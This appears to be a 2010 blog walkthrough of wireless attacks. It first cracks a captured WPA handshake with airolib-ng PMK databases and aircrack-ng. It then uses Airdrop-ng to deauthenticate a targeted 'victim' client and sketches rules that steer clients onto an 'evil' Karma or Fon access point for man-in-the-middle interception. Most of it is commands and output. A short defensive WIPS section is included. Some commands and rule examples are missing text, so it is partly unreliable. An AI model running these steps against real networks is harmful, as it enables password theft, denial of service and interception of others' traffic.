Note:  I assume you already have a packet capture of a handshake.... If not just run airodump until you obtain a handshake, or for the sake of practice you can just turn your victim card on and off to catch a capture while airodump is running on that channel.  I also assume you know the old way of cracking wpa.. If not I can post a guide on how to do that...

Setting up the databases:
First you need to create a SQLite3 database and import some SSID’s to the new database. If no database is already created then Airolib will create one for you automatically. Create a list of SSID’s from your Airodump output. Then use the Airolib command in the following format.

Airolib-ng    --import essid 

Create SSID list:
root@ficti0n:~# airolib-ng wpaDatabase --import essid ssidlist.txt
Database does not already exist, creating it...
Database sucessfully created
Reading file...

Next import your password list into the same database with the same format as when you added SSID’s to the database but replacing the keyword to passwd and adding your password list. Here is the format for this followed by an example.

Airolib-ng   --import  

Create Password List:
root@ficti0n:~# airolib-ng wpaDatabase --import passwd passwords.txt
Reading file...
This next command is an optional command called “clean” that will run integrity checks on the database and reduce the size of your database if possible.

Clean Database:
root@ ficti0n:~# airolib-ng wpaDatabase --clean all
Deleting invalid ESSIDs and passwords...
Deleting unreferenced PMKs...
Analysing index structure...
Vacuum-cleaning the database. This could take a while...
Checking database integrity...
Query done. 2 rows affected.

Create your PMK’s:
After you have imported all your SSID’s and Passwords you can create PMK hashes with the following command.

root@ ficti0n:~# airolib-ng wpaDatabase --batch
Computed 21 PMK in 0 seconds (21 PMK/s, 0 in buffer). All ESSID processed.

Now that you have databases of PMK hashes for the WPA SSID’s in your area you can run a crack against your Output cap file to retrieve your password. If all goes well and the networks password is in your database you are done.

root@ ficti0n:~# aircrack-ng -r wpaDatabase Output-02.cap
Opening Output-02.cap
Read 3347 packets.
   #  BSSID                               ESSID                     Encryption
   1  00:18:F8:66:7E:CC        ficti0nAP               WPA (1 handshake)
Choosing first network as target.
Opening Output-02.cap
                                 Aircrack-ng 1.0 r1645
                   [00:00:00] 1 keys tested (240.91 k/s)
                         KEY FOUND! [ MyPassword ] 
      Master Key     : 81 91 38 43 93 E5 28 6C 38 3F 3A 79 88 06 53 80
                       67 D5 24 01 6B BD 44 E6 5B D3 78 92 CE 85 66 60
      Transient Key  : A1 91 0B E1 2D 1C D9 31 73 A1 2B 7B 51 4E E6 C0
                       FE A9 61 49 0E B1 0B 19 76 D6 54 9D A4 4B 7B E3
                       00 05 DB 2B 90 0E DF DB F7 AB D2 53 26 6C E5 C9
                       1B 4B 73 1D 9D 94 15 9D 1E 51 79 94 F8 64 97 67
      EAPOL HMAC     : 15 55 71 33 DB A8 2C 6F 82 74 1E BF 70 72 1B F0
Quitting aircrack-ng...

Another useful option if you want to crack all the WPA networks but you want to set the priority on a specific network you can run this sql command to set that priority in the database. Try the following command to set your network as a priority.
root@ficti0n:~#  airolib-ng wpaDatabase --sql 'update essid set prio=(select min(prio)-1 from essid) where essid="ficti0nAP";'
Query done. 1 rows affected.

Monday, February 15, 2010

Airdrop-ng Basics on BT4 Final

De-Authentication and Client Manipulation

Over the last few days I have been playing with Airdrop-NG, it seems like a simple yet effective wireless attack tool. I have had some issues with its functionality, but these issues might be AP related and it seemed to be more consistently working after installing psyco. Below are my notes on using Airdrop-ng and also the information from schmoocon 2010. This tool should to be released to the public in a week or so and has a lot of potential. I will post more info later as I explore Airdrop-NG's functionality. This is just some basic usage. More advanced uses and coding projects to follow.


Airdrop-NG is a wireless de-authentication tool released at schmoocon 2010 which can also double as a poor man's WIPS depending on your intentions.  Airdrop-NG is a rule based tool that is simple to configure and easy to use. Each rules file can allow or deny traffic using Client Stations MAC's, BSSID's and a few other descriptors. Rules can be updated while the program is running in a loop making for easy on the fly changes within your attack. On each loop Airdrop-NG reparse’s the rules file and continues sending packets based on a CSV output from Airodump-ng.

Below will be a walkthrough of setting up the tool on BT4 and configuring it to attack a single client station against his BSSID. The install scripts and configurations are intuitive and quick to get working. I had zero install issues on BT4 Final. Pre Final however did give me problems.

Install airdrop-ng:
root@ficti0n:~/# cd airdrop-ng
root@ficti0n:~/# airdrop-ng python

Checking for dependancies used by the installer...
All dependancies installed! Continuing...

#### NOTE: For Ubuntu based distro's,
python2.6-dev must be installed. Please
make sure it is installed before continuing!

Welcome to the airdrop-ng installer!
You will be prompted for installing
Airdrop-ng, lorcon, and pylorcon.

Continue with installer? (y/n): y
Install airdrop-ng? (y/n): y
Build exist?
Didn't exist. Creating...
Files copied. Now, moving to directory...
Moving airdrop-ng to /usr/bin, lib to
/usr/lib/airdrop-ng, and installing man pages...
airdrop-ng installed!  =)
Would you like to install lorcon? (y/n): y
Running svn co This may tak
e a while...
A    lorcon-old/rt2500inject.h
A    lorcon-old/lorcon_decode.c
A    lorcon-old/lorcon_packasm.h
A    lorcon-old/tx80211_errno.h
A    lorcon-old/
A    lorcon-old/rt73inject.h
A    lorcon-old/madwifing_control.c

copying build/lib.linux-i686-2.5/ -> /usr/lib/python2.5/site-packages
running install_egg_info
Removing /usr/lib/python2.5/site-packages/pylorcon-1.0.egg-info
Writing /usr/lib/python2.5/site-packages/pylorcon-1.0.egg-info
Clean up? (y/n): y
Operation(s) complete! May the source be with you. =)

Install Psyco for more power:
root@ficti0n:~/# apt-get install python-psyco
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
Need to get 270kB of archives.
After this operation, 766kB of additional disk space will be used.
Get:1 pwnsauce/universe python-psyco 1.6-1 [270kB]
Fetched 270kB in 2s (122kB/s)
Selecting previously deselected package python-psyco.
(Reading database ... 225714 files and directories currently installed.)
Unpacking python-psyco (from .../python-psyco_1.6-1_i386.deb) ...
Setting up python-psyco (1.6-1) ...

Setup Wireless Interface:

root@ficti0n:~/# airmon-ng start wlan0
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
5757    dhclient3
Interface       Chipset         Driver
wlan0           RTL8187         rtl8187 - [phy0]
                                (monitor mode enabled on mon0)

Switch to another shell and run airodump:
(leave airodump running)
root@ficti0n:~/# airodump-ng -w Test --output-format csv mon0

CH  6 ][ Elapsed: 10 mins ][ 2010-02-15 18:30 ][ WPA handshake: 02:1F:38:65:AE:EF
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 02:5B:6B:4E:6C:6F   -1       26        1    0  11  54 . WEP  WEP         Testing
 02:1F:28:65:AE:ED  -24      489      391    0   1  54e  WPA2 CCMP   PSK  ficti0nsAP
 00:0B:85:6C:2D:4F  -71       48        0    0   1  54 . WEP  WEP         Linksys
 00:1B:85:6E:2D:4D  -72       48        0    0   1  54 . WEP  WEP
 06:0B:85:6C:7D:4E  -71       45        0    0   1  54 . OPN   

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
 (not associated)   02:16:08:AD:6E:95  -67    0 - 1      0        3
 (not associated)   00:A0:F8:B8:DF:69  -73    0 - 1    120       39  Linksys
 (not associated)   00:24:36:74:F1:97  -53    0 - 1      0       57
 02:0B:65:4E:6C:62  02:17:6B:20:00:ED  -72    0 - 1    124       27
 02:1F:28:65:AE:ED  00:23:4E:DF:AE:70    0   54e- 1e   979      444
 02:1F:28:65:AE:ED  00:21:00:DB:60:00  -28    0 - 1     67       91  ficti0nsAP
 02:1F:28:65:AE:ED  00:21:6A:11:0E:52  -38    1e- 2e     0      212  ficti0nsAP
 02:1F:28:65:AE:ED  00:2E:45:9F:87:AC  -38    1e- 6e     0      194  ficti0nsAP
 02:1F:28:65:AE:ED  00:23:3E:DF:ED:ED  -42   54e- 1      0       63  ficti0nsAP
 02:1F:28:65:AE:ED  00:25:08:AD:50:7C  -51   54e-24      0        2
 02:1F:28:65:AE:ED  00:1E:C2:C4:E5:79  -67    1e- 1      0       94  ficti0nsAP

Edit the example rules file:
You will need some rules that Airdrop-NG can use when attacking clients,  I will explain a bit about the rules form the schmooo presentation then we will add a rule to our rules.conf.

Rules are broken down into 3 fields: (Action/ap|clients):

2 options for state field:


5 options for AP field:
-Company OUI name value
-Company OUI numeric value

5 options for clients field
-multiple macs  (ex. mac1,mac2,mac3)
-Company OUI name value
-Company OUI numeric value

Add your rule Example:
 Below is a rule that denys all traffic to the following client "01-23-5E-DF-AE-50" from a specified BSSID

Example Deny Rule:

Rule explanation:
d = deny
/      <-- get this AP address from the airodump output
|       <-- in this case a clients address

Run airdrop with new rule:
(Leave airodump running during this!!)
Now run Airodrop-NG with the rules file you created above and your CSV output file from airodump-ng. Airdrop-NG will continuously loop through the rules file every second until you terminate the process.  This will hopefully keep your victim from having network access.

root@ficti0n:~/# python -b -i mon0 -t /root/Test-01.csv  -r docs/dropRules.conf
#             Welcome to AirDrop-ng             #

Rule Number 1
{'raw': 'd/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50', 'state': 'd', 'clients': ['00:23:4E:DF:AE:70'], 'bssid': '02:1F:28:65:AE:ED'}
Deny 00:23:4E:DF:AE:70 client to 02:1F:28:65:AE:ED bssid

Attempting to TX 4 packets 1 times each
Sent 4 packets 1 times each
Waiting 1 sec in between loops

Rule Number 1
{'raw': 'd/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50', 'state': 'd', 'clients': ['00:23:4E:DF:AE:70'], 'bssid': '02:1F:28:65:AE:ED'}
Deny 00:23:4E:DF:AE:70 client to 02:1F:28:65:AE:ED bssid

Attempting to TX 4 packets 1 times each
Sent 4 packets 1 times each
Waiting 1 sec in between loops

Rule Number 1
{'raw': 'd/02:1F:28:65:AE:ED|01-23-5E-DF-AE-50', 'state': 'd', 'clients': ['00:23:4E:DF:AE:70'], 'bssid': '02:1F:28:65:AE:ED'}
Deny 00:23:4E:DF:AE:70 client to 02:1F:28:65:AE:ED bssid


Airdrop-ng will now exit
Sent 164 Packets

Exiting Program, Please take your card mon0 out of monitor mode

Poor Man’s WIPS:

Now for the defensive portion of this walkthrough. Let’s say you want to keep your client stations from roaming over to an evil Fon or a Karma AP. You can try this with the following setup.

Create a list of your station MAC's:


Create the list of  your AP BSSID's:

Create a WIPS Rules file with the following rules

Allow 3 clients to talk to AB:AD:F2:14:00:00

Allow 3 clients to talk to EA:CF:DF:AD:00:00

Deny those 3 clients to any other access points

MITM Attacks:
An attempted example from Schmoocon was an attack on clients via MITM. This example wasn’t shown during the demo because the presenters couldn’t get their monitors working correctly.. But I imagine the ruleset would be to deny all clients’ access to the legitimate BSSID's within your airodump output and allow them all access to your KARMA or perhaps FON AP. The presenters had their own FonRules which I am guessing would go something similar to the following, but I could be way off, this however should function similarly to what I think they were going to show us.

Make a list of local BSSID's:



Add In some new rules:

Deny 3 clients to talk to AB:AD:F2:14:00:00

Deny 3 clients to talk to EA:CF:DF:AD:00:00

Allow Access to my evil AP's:

I have a couple other ideas for IDS monitoring combining other tools and also some malicious MITM I am messing around with that I will post in future posts... so far Airdrop-ng is a fun tool... enjoy...